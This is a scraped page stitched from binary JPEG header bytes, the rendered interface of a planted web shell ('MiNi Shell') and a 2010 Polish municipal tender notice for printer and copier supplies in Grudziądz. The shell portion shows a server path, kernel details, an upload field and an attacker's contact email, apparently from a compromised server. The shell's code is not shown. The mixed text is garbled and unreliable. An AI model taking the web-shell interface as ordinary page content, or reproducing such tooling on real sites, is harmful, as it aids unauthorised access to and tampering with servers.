JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100212/40800-N-2010.html

<p class="kh_header"><b>Grudziądz: Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek  i faksów na potrzeby Urzędu Miejskiego  w Grudziądzu w 2010 r.</b><br>
<b>Numer ogłoszenia: 40800 - 2010; data zamieszczenia: 12.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Grudziądz , ul. Ratuszowa 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4510233, faks (056) 4510233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek  i faksów na potrzeby Urzędu Miejskiego  w Grudziądzu w 2010 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa do Urzędu Miejskiego w Grudziądzu     materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów dla Urzędu Miejskiego w Grudziądzu.
2. Materiały eksploatacyjne dostarczone przez Wykonawcę:
1)	muszą być w 100% fabrycznie nowe, nie regenerowane, nie refabrykowane i nie napełniane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta z widocznym logo, symbolem produktu i terminem przydatności do użytku.
2)	muszą posiadać oznaczenie produktu - znak firmowy (symbol), termin ważności lub datę produkcji,
3)	w przypadku zaoferowania materiałów eksploatacyjnych równoważnych, winny one działać  analogicznie i mieć nie mniejszą wydajność, pojemność tuszu/tonera i jakość wydruku jak materiały oryginalne producenta sprzętu. Wykonawca, który oferuje materiały eksploatacyjne równoważne, dołączy do oferty oświadczenie lub inny dokument gwarantujący:                      
a)	zwrot kosztów naprawy urządzenia, jeżeli bezpośrednią przyczyną awarii będzie zastosowanie danego materiału eksploatacyjnego,
b)	bezpłatną wymianę urządzenia na nowe, jeżeli bezpośrednią przyczyną awarii będzie zastosowanie dostarczonych materiałów eksploatacyjnych, a naprawa nie przywróci jego poprzedniej użyteczności,
c)	w sytuacji, gdy Zamawiający w wyniku zastosowania dostarczonych materiałów eksploatacyjnych utraci gwarancję producenta urządzenia, Wykonawca przejmie wszelkie obowiązki gwarancyjne dotyczące urządzeń,
4)	okres gwarancji na dostarczane materiały eksploatacyjne musi wynosić co najmniej 12 miesięcy,
5)	okres gwarancji będzie liczony od daty odbioru przedmiotu zamówienia, bez zastrzeżeń,
6)	w przypadku  ujawnienia, w okresie gwarancji  uszkodzeń, wad lub niesprawności materiałów eksploatacyjnych, Wykonawca zobowiązany będzie dostarczyć nowe, wolne od wad, w terminie nie dłuższym niż 6 dni roboczych od dnia zgłoszenia przez Zamawiającego drogą telefoniczną, faksem lub pisemnie,
7)	Wykonawca zobowiązany będzie dostarczyć nowe materiały eksploatacyjne, wolne od wad, do siedziby Zamawiającego na własny koszt,
8)	w przypadku konieczności sporządzenia ekspertyzy technicznej dotyczącej dostarczonych materiałów eksploatacyjnych, koszty wykonania ekspertyzy poniesie Wykonawca.
9)	Wykonawca winien zapewnić na własny koszt i ryzyko transport zamawianego    	asortymentu. Ewentualne koszty związane z transportem Wykonawca winien 	wkalkulować w cenę jednostkową zamawianego asortymentu,
10) Wykonawca odbierze nieodpłatnie z siedziby Zamawiającego zużyte materiały eksploatacyjne , a takie wydanie nastąpi na podstawie protokołu przekazania
 UWAGA:
Ilości wskazane w Formularzach cenowych do specyfikacji istotnych warunków zamówienia  są wielkościami orientacyjnymi


Podwykonawcy:
Wykonawca, który zamierza powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na druku oferty zakresy zamówienia powierzane podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.00-2, 30.19.23.00-4, 30.19.23.40-6, 30.12.51.20-8, 30.12.51.10-5, 30.19.23.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul. Ratuszowa 1, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2010 godzina 09:30, miejsce: Urząd Miejski, Biuro Zamówień Publicznych, ul. Ratuszowa 1, 86-300 Grudziądz, pok. 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów eksploatacyjnych do drukarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa do Urzędu Miejskiego w Grudziądzu     materiałów eksploatacyjnych do drukarek:

1	Toner do HP 1005w/1200LJ		50 szt.
2	Toner do HP 1010LJ		6 szt.
3	Toner do HP 1150LJ		50 szt.
4	Toner do HP P2015dn LJ		50 szt.
5	Toner do HP 1160/1320 LJ		40 szt.
6	Toner do HP P2055dn		50 szt.
6	Toner do HP 1100 LJ		5 szt.
7	Toner do HP 4250N LJ		2 szt.
8	Atrament czarny do HP 840/920/940 C		5 szt.
9	Atrament kolor do HP 840 C		5 szt.
10	Atrament czarny do HP 710/930/980/990/6122 i plotera Desingjet 750 C plus		50 szt.
11	Atrament żółty do plotera HP Desingjet 750 C plus		6 szt.
12	Atrament błękitny do plotera HP Desingjet 750 C plus		6 szt.
13	Atrament purpurowy do plotera Desingjet 750 C plus		6 szt.
14	Atrament kolor do HP DeskJet 710 C		5 szt.
15	Atrament kolor do HP 920/930/940/980/990/6122		30 szt.
16	Atrament czarny do HP PhotoSmart 7350		5 szt.
17	Atrament kolor do HP PhotoSmart 7350		5 szt.
18	Atrament photo do HP PhotoSmart 7350		5 szt.
19	Taśmy do OKI 320/321		40 szt.
20	Toner do Lexmark E232		10 szt.
21	Toner do Lexmark E323		5 szt.
22	Toner do Lexmark E120		20 szt.
23	Taśmy do Seiko BP-9000		10 szt.
24	Toner błękitny do HP Color LaserJet 2605DN		5 szt.
25	Toner czarny do HP Color LaserJet 2605DN		5 szt.
26	Toner purpurowy do HP Color LaserJet 2605DN		5 szt.
27	Toner żółty do HP Color LaserJet 2605DN		5 szt.
28	Toner do Kyocera FS-9530DN		5 szt.
29	Toner czarny do HP Color LaserJet 5550DN		6 szt.
30	Toner błękitny do HP Color LaserJet 5550DN		6 szt.
31	Toner purpurowy do HP Color LaserJet 5550DN 		6 szt.
32	Toner żółty do HP Color LaserJet 5550DN 		6 szt.
33	Atrament czarny do HP Business InkJet 1000 		3 szt.
34	Atrament purpurowy do HP Business InkJet 1000 		3 szt.
35	Atrament żółty do HP Business InkJet 1000 		3 szt.
36	Atrament błękitny do HP Business InkJet 1000 		3 szt.
37	Toner czarny do HP Color LaserJet 3550n 		2 szt.
38	Toner błękitny do HP Color LaserJet 3550n 		2 szt.
39	Toner żółty do HP Color LaserJet 3550n 		2 szt.
40	Toner purpurowy do HP Color LaserJet 3550n 		2 szt.
41	Atrament czarny do HP Photosmart 8450		10 szt.
42	Atrament kolorowy do HP Photosmart 8450		10 szt.
43	Atrament photo do HP Photosmart 8450		10 szt.
44	Toner do Samsung ML-2250		3 szt.
45	Toner do Samsung ML-2851ND		30 szt.
46	Toner do Toshiby E-studio 233		6 szt.
47	Toner czarny do HP CP2025dn		5 szt.
48	Toner żółty do HP CP2025dn		5 szt.
49	Toner purpurowy do HP CP2025dn		5 szt.
50	Toner błękitny do HP CP2025dn		5 szt.
51	Atrament czarny matowy do Plotera T1100		4 szt.
52	Atrament żółty do Plotera T1100		4 szt.
53	Atrament  purpurowy do Plotera T1100		4 szt.
54	Atrament błękitny do Plotera T1100		4 szt.
55	Atrament czarny fotograficzny do Plotera T1100		4 szt.
56	Atrament szary do Plotera T1100		4 szt.
57	Głowica czarna matowa do Plotera T1100		4 szt.
58	Głowica żółta do Plotera T1100		4 szt.
59	Głowica purpurowa do Plotera T1100		4 szt.
60	Głowica błękitna do Plotera T1100		4 szt.
61	Głowica szara do Plotera T1100		4 szt.
62	Głowica czarna fotograficzna do Plotera T1100		4 szt.
63	Atrament czarny do HP PSC F2280		2 szt.
64	Atrament kolorowy do HP PSC F2280		2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.00-2, 30.19.23.00-4, 30.19.23.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów eksploatacyjnych do kserokopiarek i faksów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa do Urzędu Miejskiego w Grudziądzu     materiałów eksploatacyjnych do  kserokopiarek i faksów:
					
1	TONER DO KSERO SHARP  AR 5316			22szt.		
2	TONER DO KSERO SHARP  AM 400			5szt.		
3	TONER DO KSERO SHARP  AR 5415/AR 203		8szt.		
4	TONER DO KSERO SHARP  ARM 160/AR 165		16szt.		
5	TONER DO KSERO SHARP  AR 5625			5szt.		
6	TONER DO KSERO SHARP  MX 450			15szt.		
7	TONER DO KSERO MINOLTA  EP 1030			3op.		
8	TONER DO KSERO MINOLTA  Di 350/Di 351		3op.		
9	TONER DO KSERO MINOLTA  EP 1054			2op.		
10	TONER DO KSERO KONICA  MINOLTA Di 1611		8op.		
11	TONER DO KSERO DEWELOP  D 2050
             TONER DO KSERO DEWELOP INEO 161
           TONER DO KSERO DEWELOP INEO 210		8op.		
12	TONER DO KSERO DEWELOP INEO 350		18szt.		
13	TONER DO KSERO KONICA  7115 			2szt.		
14	TONER DO KSERO RICOH  FT 4015			8szt.		
15	TONER DO KSERO TOSHIBA  E - STUDIO 207   24TYS. KOPII		5szt.		
16	TONER DO KSERO GESTETNER DSM 725		4szt.		
17	TONER DO KSERO SHARP AR 5516			10szt.		
18	TAŚMA DO FAXU SHARP  UX - 310			6szt.		
19	TAŚMA DO FAXU  PANASONIC  KX - FC 238		20szt.		
20	TONER DO URZĄDZENIA WIELOFUNKCYJNEGO SAMSUNG SCX-4720FN	1szt.		
21	TAŚMA DO FAXU PANASONIC  KX - FP 343/363		20szt.		
22	TONER DO FAXU PANASONIC KX - FL 613		20szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.40-6, 30.12.51.20-8, 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com